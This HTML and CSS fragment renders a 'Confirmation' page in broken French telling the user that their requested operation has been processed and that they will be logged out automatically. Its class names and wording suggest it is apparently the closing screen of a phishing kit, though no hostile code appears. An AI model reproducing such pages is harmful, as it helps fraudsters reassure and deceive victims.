<input type="hidden" id="DivName" Value="Confirmation">
<style>
        .MLG8KIT{
            background-color: white;
            padding: 0px;
        }
        .myButton {
            background-color:#4170a9;
            border:1px solid #4170a9;
            display:inline-block;
            color:#ffffff;
            font-family:Arial;
            font-size:13px;
            font-weight:bold;
            padding:3px 14px;
            text-decoration:none;
        }
        input {
             padding: 0px;
             font-size: 14px;
             border-width: 0px;
             border-color: #CCCCCC;
             background-color: #FFFFFF;
             color: #5f5e5e;
             border-style: solid;
             border-radius: 0px;
             box-shadow: 0px 0px 2px rgba(66,66,66,.75);
             text-shadow: 0px 0px 0px rgba(255,255,255,.0);
        }
        
        
        
        
        </style>
        <!--
                905 * 386 / 280 * 386
        -->
        <div class="row">
                <div class="col-sm-12 col-xm-12 col-xs-12">
                 <img src="imgs/vos_bn.png" alt="">        
                </div>
         </div>
        <div class="row">
                <!--  <div class="col-md-3 col-xm-3 col-xs-3">
                       <img src="imgs/body_left.png" alt=""> 
                 </div>
                 
                 <div class="col-md-0.1">
                        <img src="imgs/lg_far9.png" alt=""> 
                 </div> -->
                 
                 <div class="col_lg_8 col-md-8 col-xm-8 col-xs-8 MLG8KIT">
                                <div class="panel panel-primary">
                                                <div class="panel-heading"><h6><img src="imgs/vr.png" class="img-fluid" style="max-width:100%; height: auto;"></h6></div>
                                                <div class="panel-body">
                        <div style="padding-top: 20px;"></div>
                        <center>
                                <div id="myunderdiv" class="img-fluid" style="max-width:100%; height: auto;" >
                                <div style="padding-top: 10px;"></div>
                                        
                                                        <div class="alert alert-info" role="alert">
                                                                        <h6 class="alert-heading">votre opération demmander a été traiter veuillez patienter</h6>
                                                                         <p> Vous allez se déconnecter automatiquement </p>
                                                        </div>
                                        </div>
                        </center>
                        <div style="padding-top: 20px;"></div>
                </div></div></div>
        </div>
                </div>
                <div style="padding-top: 30px;"></div>
        <div class="row">
                <div class="col-sm-12 col-xm-12 col-xs-12">
                 <img src="#" alt="">
                </div>
        </div>
        